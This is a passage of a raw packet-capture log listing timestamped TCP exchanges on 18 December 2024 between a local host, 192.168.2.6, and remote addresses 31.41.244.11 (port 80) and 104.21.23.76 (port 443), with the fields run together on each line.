                                                                                                                                                                  Dec 18, 2024 11:09:30.468894005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.468934059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.468990088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.469070911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.469871998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.469944954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.469994068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.470118046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.470843077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.470892906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.470902920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.470937967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.471837044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.471882105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.471961975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.471997976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.472820044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.472866058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.472923994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.472955942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.473818064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.473869085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.473918915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.473957062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.474792957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.474944115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.474982023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.475775957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.475888968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.475933075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.476733923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.476777077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.476849079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.476888895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.477705956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.477773905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.477780104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.477807999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.478677988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.478722095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.478760958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.478801012 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.479706049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.479748011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.479908943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.479948997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.480762005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.480809927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.480844975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.480879068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.481666088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.481803894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.481839895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.482628107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.482769966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.482817888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.483751059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.483793974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.483870983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.484599113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.484638929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.484726906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.485586882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.485647917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.485713959 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.485753059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.486547947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.486726999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.486768007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.487546921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.487639904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.487679005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.488533974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.488575935 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.488645077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.489509106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.489551067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.489593983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.490228891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.490497112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.490598917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.490641117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.491494894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.491601944 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.491647005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.492647886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.492691040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.492702007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.492741108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.493443012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.493484020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.493532896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.493572950 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.629760981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.629796982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.629910946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.630213976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.630378962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.630603075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.631122112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.631169081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.631192923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.631221056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.632112980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.632168055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.632203102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.633210897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.633264065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.633347988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.633732080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.634072065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.634202003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.634248972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.635039091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.635143995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.635194063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.636064053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.636117935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.636162043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.637008905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.637109995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.637402058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.637980938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.638037920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.638117075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.638154984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.638989925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.639040947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.639077902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.639111996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.639971972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.640033960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.640110970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.640146017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.641010046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.641050100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.641124964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.641913891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.641952038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.646862030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.646908998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.646944046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.646980047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.647262096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.647325993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.647414923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.647464991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.648405075 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.648423910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.648466110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.649249077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.649358988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.649363041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.649415970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.650229931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.650269032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.650319099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.650356054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.651197910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.651237965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.651297092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.651403904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.652230024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.652271032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.652304888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.652345896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.653167963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.653256893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.653353930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.653393030 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.654170990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.654294014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.654314995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.654356003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.655118942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.655239105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.655251980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.655291080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.656124115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.656173944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.656219959 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.656276941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.657103062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.657161951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.657164097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.657210112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.658050060 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.658104897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.658159971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.658210039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.659060955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.659112930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.659157038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.659203053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.660053015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.660095930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.660164118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.660207033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.661119938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.661143064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.661195040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.662103891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.662168026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.662189007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.662209988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.663058043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.663100958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.663126945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.663166046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.663985968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.664028883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.664158106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.664222002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.664918900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.664978027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.665000916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.665069103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.665918112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.665960073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.666009903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.666050911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.666918039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.666961908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.666961908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.667000055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.667890072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.667937994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.668040037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.668082952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.669004917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.669042110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.669049978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.669181108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.670032978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.670075893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.670237064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.670277119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.670835972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.670875072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.670924902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.670963049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.671843052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.671919107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.671977043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.672013998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.672797918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.672842026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.672873020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.672913074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.673760891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.673809052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.673858881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.673899889 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.674755096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.674791098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.675050974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.675102949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.675725937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.675838947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.675838947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.675890923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.676731110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.676773071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.676848888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.676904917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.678698063 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.678709984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.678720951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.678760052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.678843021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.679924965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.679943085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.679949045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.679975033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.679996967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.681544065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.681556940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.681601048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.682626009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.682636976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.682646990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.682972908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.683738947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.683752060 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.683767080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.683789015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.683911085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.685543060 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.685554028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.685605049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.798105001 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.798177004 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:30.799385071 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:30.799396038 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.799627066 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.800996065 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:30.801023960 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:30.801068068 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.820907116 CET804991231.41.244.11192.168.2.6
